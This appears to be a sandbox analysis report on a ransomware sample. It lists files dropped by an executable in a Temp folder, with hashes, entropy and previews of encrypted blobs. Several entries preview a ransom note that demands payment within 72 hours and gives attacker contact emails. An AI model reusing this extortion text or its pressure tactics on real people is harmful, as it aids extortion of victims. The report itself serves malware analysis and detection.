                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):288
                                                                                                                                            Entropy (8bit):7.2213221697986345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:cbEHi0BVUQN/bES3ziN23/jIthbeG8lcUoR8onSczFUfsdJMn:zgS3+N23/jIinlcDScpxMn
                                                                                                                                            MD5:594F9AA2C9697C5EEAEDF87B768CF0BD
                                                                                                                                            SHA1:732F75EB8FC069301E72D62DAC3C7AE520E01612
                                                                                                                                            SHA-256:689ECB69885CF282CF9B63422F5052C4546EE6E56ADF8F4C08AED232D88415F6
                                                                                                                                            SHA-512:784323292CF8932DC1EE700A259F52C8C0E5310F8B4935D374530D6C05EECCAA5CE434CA312687E4D4C6587AD9A521DB6FE2B413D36EC7B79390ADB240A5FAE5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:j\...{..;...VS.3>>].>>r..7.t.....\Z#UqjG~Q./m...t..d..v.=P..+#.............W..U.dJ-....n^...l....FV4%u..h]Hm.t;w@.#.%i...z....E...lM.N.U.5.....;..%....W.'....s...@e^......!..9s.Mc....8..uZp.3R.....5...............R.G..#r. .:Iz....n)....<...7.....7....&m...Q....x.H..e.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):288
                                                                                                                                            Entropy (8bit):7.2213221697986345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:cbEHi0BVUQN/bES3ziN23/jIthbeG8lcUoR8onSczFUfsdJMn:zgS3+N23/jIinlcDScpxMn
                                                                                                                                            MD5:594F9AA2C9697C5EEAEDF87B768CF0BD
                                                                                                                                            SHA1:732F75EB8FC069301E72D62DAC3C7AE520E01612
                                                                                                                                            SHA-256:689ECB69885CF282CF9B63422F5052C4546EE6E56ADF8F4C08AED232D88415F6
                                                                                                                                            SHA-512:784323292CF8932DC1EE700A259F52C8C0E5310F8B4935D374530D6C05EECCAA5CE434CA312687E4D4C6587AD9A521DB6FE2B413D36EC7B79390ADB240A5FAE5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:j\...{..;...VS.3>>].>>r..7.t.....\Z#UqjG~Q./m...t..d..v.=P..+#.............W..U.dJ-....n^...l....FV4%u..h]Hm.t;w@.#.%i...z....E...lM.N.U.5.....;..%....W.'....s...@e^......!..9s.Mc....8..uZp.3R.....5...............R.G..#r. .:Iz....n)....<...7.....7....&m...Q....x.H..e.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):290
                                                                                                                                            Entropy (8bit):7.186969424444108
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:/RBBi/DiAxXkEXO2+Ewwd7v/DwDIvGopKPvVH2miCEKsagZ+DNdHn:4/2Ax0EE8vwDk5pMVH6CgZ+ZdHn
                                                                                                                                            MD5:9E06A872563E90B4D3AAEEBB831C2F8A
                                                                                                                                            SHA1:C3A612F6DAC89563938BE80F48C255A05E19AC34
                                                                                                                                            SHA-256:9BFBEFD68429FBBB2282E1C0610F04DA3DAE45DC77137012301A489F9B90F1FB
                                                                                                                                            SHA-512:81C24736CD53E227CCCF93CBF84CED0F46800518D19081C5B0268658B2EE656F0F78C5514D5C266A632C52DAD1A0EBA1360216AE1A12B520FDDEA4D0456E7BD7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...o..E.1R...w.<<>>].>>...8...3X.^B...j./o..x..bE..E."qz.,*......lT#..9..7.....<L$..r%o.`...oD.!wS..".=4.9b.i....'>.R.......zUt..^..W.b.....2.o5_].....*.t.f.MT..5.=v.26......w..f....#..(1.a_......q/.y.T+s.E......P....=N..s!..`.~p.......7.o.j.....%..$Xrbi..*G...+..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):290
                                                                                                                                            Entropy (8bit):7.186969424444108
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:/RBBi/DiAxXkEXO2+Ewwd7v/DwDIvGopKPvVH2miCEKsagZ+DNdHn:4/2Ax0EE8vwDk5pMVH6CgZ+ZdHn
                                                                                                                                            MD5:9E06A872563E90B4D3AAEEBB831C2F8A
                                                                                                                                            SHA1:C3A612F6DAC89563938BE80F48C255A05E19AC34
                                                                                                                                            SHA-256:9BFBEFD68429FBBB2282E1C0610F04DA3DAE45DC77137012301A489F9B90F1FB
                                                                                                                                            SHA-512:81C24736CD53E227CCCF93CBF84CED0F46800518D19081C5B0268658B2EE656F0F78C5514D5C266A632C52DAD1A0EBA1360216AE1A12B520FDDEA4D0456E7BD7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...o..E.1R...w.<<>>].>>...8...3X.^B...j./o..x..bE..E."qz.,*......lT#..9..7.....<L$..r%o.`...oD.!wS..".=4.9b.i....'>.R.......zUt..^..W.b.....2.o5_].....*.t.f.MT..5.=v.26......w..f....#..(1.a_......q/.y.T+s.E......P....=N..s!..`.~p.......7.o.j.....%..$Xrbi..*G...+..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65716
                                                                                                                                            Entropy (8bit):6.568698239440117
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:SLrYIzwC/n1nwyJhnxsxPwkZ6x5RX1X2QdQZiXEWZBMZ/dYS8VLm+kig+GPG6F:bIkC/1wSnxslEkZ4ZeZutbzfQ
                                                                                                                                            MD5:5F585CF230F417D931EB26CE9C0C006F
                                                                                                                                            SHA1:F8A09E6098D9C5D3DF9AE142A9323021B59C0E6C
                                                                                                                                            SHA-256:7BDEBB9C8F14966CA560BD37C67D6D05674E96B489D487C307EC54F80687EF40
                                                                                                                                            SHA-512:0671AE2EE8BB9AEE798DB5B781FE02DD1E1E2D97270721BD10979BA2FC0E94AC20E2E3CFE49D17D9C6EECE734FA04F1774C0A09C00E6581BFB00DDBD62AC963F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.@...i.N.....o...E...|uo...K.L.V.H..</.V.....].5.d<..ic.)y.>.._.^......e..>....F...^..f.A...D.2C..1..i#.....b....l/.e.j...c..!@.y}..2eH..$........:.>.;.F.@5.15|N.U..m.*...4.Mk7b:.T .K...L...keW.z.T......p...=.r...o....}. ..o..G!t.O_nB.p..H...HMW^'....m.u........_/y......$kx...^...X'.L.1($\.....6.G@U..S.Y....2.m...d..Qr.a*.6.l.N~L...wKwiIOZv...G.eF@.+..Ey..4.....E...z..&....o....I.....o..=V.f...I...W..}...c...u..Z...X.{.X..Z..U.W_9..q-}...%.4.....V..h.....$uA.....w.'...(.8..T....&.5".4.!}..]7..J..x...\.`.s..H...d8..8.F.......Vkn?w^)s.|N}...scp3....C[QD..-.=.d./....WCe..X..."..9.....C.....3d:..&..nh]v...+J..mBi..}D.h7yd.-[.^..~1..i.(C.&.69w.M...c.1.......LN..Y5...{......L./..8d.N......^m.Pn.eq(....u..`.e...LF....)...V..g.) .J.I..A.,.@.p..~...~...D......m[.A..1oA;p.E?..Q.o.........'....!!...u........(/.... .N8....K.....|u...........#L~.L...n..EA.........".Xy..Y'..f;...7!..n.,$.....>]....N...j..J@..L}a..J.W.im..4tlfiq.v.,=u.G.........
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65716
                                                                                                                                            Entropy (8bit):6.568698239440117
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:SLrYIzwC/n1nwyJhnxsxPwkZ6x5RX1X2QdQZiXEWZBMZ/dYS8VLm+kig+GPG6F:bIkC/1wSnxslEkZ4ZeZutbzfQ
                                                                                                                                            MD5:5F585CF230F417D931EB26CE9C0C006F
                                                                                                                                            SHA1:F8A09E6098D9C5D3DF9AE142A9323021B59C0E6C
                                                                                                                                            SHA-256:7BDEBB9C8F14966CA560BD37C67D6D05674E96B489D487C307EC54F80687EF40
                                                                                                                                            SHA-512:0671AE2EE8BB9AEE798DB5B781FE02DD1E1E2D97270721BD10979BA2FC0E94AC20E2E3CFE49D17D9C6EECE734FA04F1774C0A09C00E6581BFB00DDBD62AC963F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.@...i.N.....o...E...|uo...K.L.V.H..</.V.....].5.d<..ic.)y.>.._.^......e..>....F...^..f.A...D.2C..1..i#.....b....l/.e.j...c..!@.y}..2eH..$........:.>.;.F.@5.15|N.U..m.*...4.Mk7b:.T .K...L...keW.z.T......p...=.r...o....}. ..o..G!t.O_nB.p..H...HMW^'....m.u........_/y......$kx...^...X'.L.1($\.....6.G@U..S.Y....2.m...d..Qr.a*.6.l.N~L...wKwiIOZv...G.eF@.+..Ey..4.....E...z..&....o....I.....o..=V.f...I...W..}...c...u..Z...X.{.X..Z..U.W_9..q-}...%.4.....V..h.....$uA.....w.'...(.8..T....&.5".4.!}..]7..J..x...\.`.s..H...d8..8.F.......Vkn?w^)s.|N}...scp3....C[QD..-.=.d./....WCe..X..."..9.....C.....3d:..&..nh]v...+J..mBi..}D.h7yd.-[.^..~1..i.(C.&.69w.M...c.1.......LN..Y5...{......L./..8d.N......^m.Pn.eq(....u..`.e...LF....)...V..g.) .J.I..A.,.@.p..~...~...D......m[.A..1oA;p.E?..Q.o.........'....!!...u........(/.... .N8....K.....|u...........#L~.L...n..EA.........".Xy..Y'..f;...7!..n.,$.....>]....N...j..J@..L}a..J.W.im..4tlfiq.v.,=u.G.........
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1003
                                                                                                                                            Entropy (8bit):7.788507181253983
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:WEIb3P7ldJ9z3gC9kQROktDQ/B5RljE54Bd7k+ermyN55ldGot2CfUeZbj86+3vB:kf7fJB/9kQROTj4yC5PGosgbjpVHLk62
                                                                                                                                            MD5:4A63BF051B92BA0E5BDEAD66189E25F6
                                                                                                                                            SHA1:A21F5939F4C8514409F63840D7B55F54A7E2952C
                                                                                                                                            SHA-256:2A5F9DAE898104FCD1F010C05ABA95B32E2DE235E87DC7F362B157660D091696
                                                                                                                                            SHA-512:38C1F5712010924681D897B0FB3B652C834670F30EE38D6239100EE7DF478734CC4032258A83EF0A34BBC4A5A23289D4FC95DB5AB8949A9A17E6522D9E1D98EC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<.*...$..(*#.......BExM..(.z.G.s...~v|h.e..qrt7n.J;..U.Jv....g$.Kf.L.uK.}.~..K.....<"..Pu..G..j...Y_`..`...p./.;.@..w/^.i.....bF.M8.Q.!...kF....y4....Z.j...fh...:\....!W.<G./3.rn..z.N1.%..h...Q..5.$....A."j....^.0.h...c.....uO...[K.....#.....}..ib.p.5..`.8['._00'.^..\...T....O..!..........F..3...N.u[.#,.7.;...hO?.KE8k.{EZ:GJHd.d3O]..q..Z..Z......m4,.EPy.i..&..9S.,..#....B.O..k...L..x..J..&Fh..G....?..H..y..{.R.f...e...[y.`....j{_.MT......K...8}.i.5'3.O..Bc_.`.. /k{...v....e..5...N..K).Uu.)!.~.*....m.6..F...~..q.|Iz.C.....|z.[SK.......=EDQ...$....../..t.....]a.......L.....K....eH%81....Q.............%..Y....*..;.q..;.....[<.{.E....h...Y.."t>..!.yo.K...P.....`.e<...$...(..vP.:.....^$..^VM..m..<......~.,.e+...8.~'..1.-.Q-!reN=..Q>.KB.....7BqO....8}.....g$....F.Mj...L.......e.#.bO.h.+)F.t..#c..Z...M.K.M.V.y...n....4G..n.....2.3y.)...>.6.Is.......d.i..cB.E.S.....'.-..y.be....za..",.e.(..>.i'.....d.......5..P.*...{J-.1~0xABADC
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1003
                                                                                                                                            Entropy (8bit):7.788507181253983
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:WEIb3P7ldJ9z3gC9kQROktDQ/B5RljE54Bd7k+ermyN55ldGot2CfUeZbj86+3vB:kf7fJB/9kQROTj4yC5PGosgbjpVHLk62
                                                                                                                                            MD5:4A63BF051B92BA0E5BDEAD66189E25F6
                                                                                                                                            SHA1:A21F5939F4C8514409F63840D7B55F54A7E2952C
                                                                                                                                            SHA-256:2A5F9DAE898104FCD1F010C05ABA95B32E2DE235E87DC7F362B157660D091696
                                                                                                                                            SHA-512:38C1F5712010924681D897B0FB3B652C834670F30EE38D6239100EE7DF478734CC4032258A83EF0A34BBC4A5A23289D4FC95DB5AB8949A9A17E6522D9E1D98EC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<.*...$..(*#.......BExM..(.z.G.s...~v|h.e..qrt7n.J;..U.Jv....g$.Kf.L.uK.}.~..K.....<"..Pu..G..j...Y_`..`...p./.;.@..w/^.i.....bF.M8.Q.!...kF....y4....Z.j...fh...:\....!W.<G./3.rn..z.N1.%..h...Q..5.$....A."j....^.0.h...c.....uO...[K.....#.....}..ib.p.5..`.8['._00'.^..\...T....O..!..........F..3...N.u[.#,.7.;...hO?.KE8k.{EZ:GJHd.d3O]..q..Z..Z......m4,.EPy.i..&..9S.,..#....B.O..k...L..x..J..&Fh..G....?..H..y..{.R.f...e...[y.`....j{_.MT......K...8}.i.5'3.O..Bc_.`.. /k{...v....e..5...N..K).Uu.)!.~.*....m.6..F...~..q.|Iz.C.....|z.[SK.......=EDQ...$....../..t.....]a.......L.....K....eH%81....Q.............%..Y....*..;.q..;.....[<.{.E....h...Y.."t>..!.yo.K...P.....`.e<...$...(..vP.:.....^$..^VM..m..<......~.,.e+...8.~'..1.-.Q-!reN=..Q>.KB.....7BqO....8}.....g$....F.Mj...L.......e.#.bO.h.+)F.t..#c..Z...M.K.M.V.y...n....4G..n.....2.3y.)...>.6.Is.......d.i..cB.E.S.....'.-..y.be....za..",.e.(..>.i'.....d.......5..P.*...{J-.1~0xABADC
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10506
                                                                                                                                            Entropy (8bit):4.268907588056424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QkfPwxNaJXak73sedvGMwXZkanFBvRM44vSRrNCVRDN3:ZHJXP56ptnLpf4+oVRDN3
                                                                                                                                            MD5:07985958CD0D25C7CDE7AF7A0A699103
                                                                                                                                            SHA1:C46BF22644D4332494DD6FA0FBC419996230DEF2
                                                                                                                                            SHA-256:1A8D42A1FE874ADF4492B85BA98B805167331F0EE56DC874C563AC619D077824
                                                                                                                                            SHA-512:4DC5907B4AE42D4E71A76E0A0E094D212E94BCA45612B0208521DF42BABD43CCB8D7F63812B1AF6F735AD5F3122A55E2FCF437C98ABA6A0B968C3A21E13E4A8D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:B..(.v.H.!.....@.........T=...o........@.....b...q.e...?g..V.A.|W.7]./:.!....>.T.*.....GpC"Q!.M..<...(.N.A..R.e.......\.|..8..1Uc.a.Hj..N.~L.F.4.v.k...-.....-.......lY.z..p._.gc.zl..g......-X.........$.._.+..(w..j)RU..P.M...$.@.#....^.?-.{UTD.D...gH..`.%....D.........kR;.B<..M*}H...x.2"...t.7/.u...!..!....[.SQ.<....x.........j...F"_D..Yb.[..............\\......mX....i.....`wC...,H#9l.EY..h...R ..15...}s..~N.24...y.P'.\'d.+.....%..l.)..J&?y....61P.].k4...AB...u.%)SF....K.-....q....-]n.}.~1.z.......;....)Fp..aJ..R.....l...vL^..xG.g..=%..*.....I.i.N..-....\.. .OwDR.;p4;fpw.]B..(....*..x>.d..k.`2!p.L.:.T..9..;88..\..".Slu..6H#n.>?.f......y...Uxx.`...J..XOi;...)#..9..=a.pf....G,.....<.......U..o...1`..h.R..1xI...C.1.~.J.J.o..m.x..m.U..yx..X...j.0.C.?b.$.|..ig#V.*L....O...n....T&.}.R...l.R.d..T.8......r.U..LS..S..7...y*..!.Q...Pp.w.....M.z.rRciv........+)...../.i...X......>....:...B..()....`p..=+..............P..2._....)..<s-'{W..^c\..1<.a..{
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10506
                                                                                                                                            Entropy (8bit):4.268907588056424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QkfPwxNaJXak73sedvGMwXZkanFBvRM44vSRrNCVRDN3:ZHJXP56ptnLpf4+oVRDN3
                                                                                                                                            MD5:07985958CD0D25C7CDE7AF7A0A699103
                                                                                                                                            SHA1:C46BF22644D4332494DD6FA0FBC419996230DEF2
                                                                                                                                            SHA-256:1A8D42A1FE874ADF4492B85BA98B805167331F0EE56DC874C563AC619D077824
                                                                                                                                            SHA-512:4DC5907B4AE42D4E71A76E0A0E094D212E94BCA45612B0208521DF42BABD43CCB8D7F63812B1AF6F735AD5F3122A55E2FCF437C98ABA6A0B968C3A21E13E4A8D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:B..(.v.H.!.....@.........T=...o........@.....b...q.e...?g..V.A.|W.7]./:.!....>.T.*.....GpC"Q!.M..<...(.N.A..R.e.......\.|..8..1Uc.a.Hj..N.~L.F.4.v.k...-.....-.......lY.z..p._.gc.zl..g......-X.........$.._.+..(w..j)RU..P.M...$.@.#....^.?-.{UTD.D...gH..`.%....D.........kR;.B<..M*}H...x.2"...t.7/.u...!..!....[.SQ.<....x.........j...F"_D..Yb.[..............\\......mX....i.....`wC...,H#9l.EY..h...R ..15...}s..~N.24...y.P'.\'d.+.....%..l.)..J&?y....61P.].k4...AB...u.%)SF....K.-....q....-]n.}.~1.z.......;....)Fp..aJ..R.....l...vL^..xG.g..=%..*.....I.i.N..-....\.. .OwDR.;p4;fpw.]B..(....*..x>.d..k.`2!p.L.:.T..9..;88..\..".Slu..6H#n.>?.f......y...Uxx.`...J..XOi;...)#..9..=a.pf....G,.....<.......U..o...1`..h.R..1xI...C.1.~.J.J.o..m.x..m.U..yx..X...j.0.C.?b.$.|..ig#V.*L....O...n....T&.}.R...l.R.d..T.8......r.U..LS..S..7...y*..!.Q...Pp.w.....M.z.rRciv........+)...../.i...X......>....:...B..()....`p..=+..............P..2._....)..<s-'{W..^c\..1<.a..{
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24418
                                                                                                                                            Entropy (8bit):2.365300886043448
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:XonoCgttz22x59Il50zoaFcYDRv6+onTbS:0uh22x59IHpaqkvWnHS
                                                                                                                                            MD5:A1F2177388DD2811AA5F2237895D90C8
                                                                                                                                            SHA1:1416935050D94141F5B6E5334D1B3A4AEF14880C
                                                                                                                                            SHA-256:FCF23F89505D9CDF1D752C74662CFA3806EC8B705BE47EC03143245C0F793B22
